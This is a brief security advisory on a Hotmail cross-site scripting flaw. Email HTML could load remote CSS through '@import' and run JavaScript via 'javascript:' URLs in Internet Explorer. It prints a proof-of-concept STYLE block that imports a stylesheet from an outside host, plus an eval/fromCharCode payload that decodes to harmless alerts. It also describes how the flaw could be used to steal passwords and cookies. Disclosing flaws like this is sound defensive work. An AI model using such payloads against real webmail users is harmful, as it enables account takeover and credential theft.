Vulnerability

    Hotmail

Affected

    www.hotmail.com

Description

    Georgi  Guninski  found   following.   Hotmail  allows   executing
    JavaScript code in email messages using

        @import url(http://host/hostile.css)

    which  may  compromise  user's  Hotmail  mailbox  when viewed with
    Internet  Explorer.   Several  months  ago  in his advisory Georgi
    alerted about  a Hotmail  bug with  "@import url(javascript:...)".
    It was  fixed, but  now he  found a  similar bug.   There is a new
    security  flaw  in  Hotmail  which  allows injecting and executing
    JavaScript code  in an  email message  using the  the <STYLE> tag,
    @import and  the "javascript:"  protocol.   This exploit  works on
    Internet Explorer.   Hotmail tries to  filter JavaScript code  for
    security  reasons.   Executing  JavaScript  when  the  user  opens
    Hotmail email message allows  for example displaying a  fake login
    screen where the  user enters his  password which is  then stolen.
    It is also possible to read user's messages, to send messages from
    user's name and doing other mischief.  It is also possible to  get
    the cookie from Hotmail, which is dangerous.  Hotmail deliberately
    escapes all JavaScript  (it can escape)  to prevent such  attacks,
    but obviously there are holes.

    The  following  JavaScript  is  executed  if  embedded  in  a HTML
    message:

        <STYLE type=text/css>
        @import url(http://www.nat.bg/~joro/test.css);
        </STYLE>

    where http://www.nat.bg/~joro/test.css contains:

        @import url(javascript:alert('JavaScript is executed'));
        @import
        url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));

Solution

    Disable Active Scripting before viewing a Hotmail message or don't
    use IE.   This bug  was fixed  by MS  on their  servers (including
    Hotmail) as well.